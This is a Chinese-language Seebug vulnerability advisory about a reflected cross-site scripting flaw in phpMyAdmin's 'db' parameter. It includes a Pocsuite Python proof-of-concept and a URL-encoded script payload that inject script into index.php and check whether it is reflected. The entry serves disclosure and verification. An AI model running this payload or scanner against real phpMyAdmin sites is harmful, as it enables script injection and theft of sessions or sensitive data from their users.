phpMyAdmin 'db'参数跨站脚本漏洞

2009-07-03T00:00:00
ID SSV:11748
Type seebug
Reporter Root
Modified 2009-07-03T00:00:00

Description

Bugraq ID: 35531 CNCAN ID:CNCAN-2009070104

phpMyAdmin是一款基于PHP的MySQL管理程序。 phpMyAdmin存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 问题是由于对'db'参数缺少过滤,构建恶意脚本代码作为参数,可导致触发跨站脚本攻击。

phpMyAdmin phpMyAdmin 3.3.0-dev phpMyAdmin phpMyAdmin 3.2.1-dev phpMyAdmin phpMyAdmin 3.2.0.1 phpMyAdmin phpMyAdmin 3.2.0-rc1 phpMyAdmin phpMyAdmin 2.11.10-dev 目前没有解决方案提供: http://www.phpmyadmin.net/

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests

'''
vulurl:
http://www.example.com/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10

'''

class TestPOC(POCBase):
    vulID = '11748'  # ssvid
    version = '1.0'
    author = ['XXXX']
    vulDate = ''
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-11748']
    name = 'phpMyAdmin db参数跨站脚本漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = 'XSS'
    desc = '''
    phpMyAdmin db参数跨站脚本漏洞
    '''
    samples = ['']
    
    def _verify(self):
        result = {}

        vulurl = self.url + '/index.php?db=">\'><script>prompt("SEBUG@TEST");</script>'

        r = requests.get(vulurl)
        print r.url
        
        if '<script>prompt("SEBUG@TEST");</script>' in r.content:
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = r.url

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)